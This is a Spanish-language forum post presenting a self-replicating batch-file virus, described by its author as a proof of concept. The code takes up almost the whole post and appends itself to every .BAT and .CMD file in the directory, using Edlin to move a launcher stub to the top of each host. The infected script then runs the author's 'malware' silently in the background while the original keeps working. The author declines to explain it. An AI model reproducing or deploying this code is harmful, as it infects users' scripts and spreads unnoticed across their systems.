¿Infección en batch?

Iniciado por binary_death, Septiembre 03, 2013, 06:06:39 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 03, 2013, 06:06:39 PM Ultima modificación: Abril 03, 2015, 12:10:36 AM por fermino
Código: dos

@:_v_main
@Echo Off %v_main%
For /f "Tokens=* Delims=" %%i in ( %v_main%
'Dir/b *.BAT *.CMD' %v_main%
) Do Call:_Infect "%%~i" "%~0" %v_main%
Exit/B 0 %v_main%
:_Infect %v_main%
Find "@::i_b_t"<"%~1">NUL && GoTo:EoF %v_main%
For /f "Tokens=1 Delims=" %%_ in ( %v_main%
'Type "%~1"^|find /v /c ""^<"%~1"'%v_main%
) Do Set/A "beg_rg=%%_+1" & Set/A "end_rg=%%_+6" %v_main%
( %v_main%
Echo. %v_main%
Echo.@::i_b_t %v_main%
Echo.@Set "Str_R=v_ma" %v_main%
Echo.@GoTo:_%%~1 %v_main%
Echo.:_ %v_main%
Echo.@Start "" /B /high "%%~0" %%Str_R%%in %v_main%
) >> "%~1" %v_main%
( %v_main%
Echo.%beg_rg%,%end_rg%,1M %v_main%
Echo.E %v_main%
)|Edlin /B %~1 %v_main%
Find "v_main"<"%~2">>"%~1" %v_main%
Goto:EoF %v_main%


No voy a dar explicaciones. Nada más decir que es una prueba de concepto de cómo infectar otros ficheros .bat y que al abrirlos, se ejecute nuestro malware pero sin interrumpir la ejecución del bat original ni un segundo  :P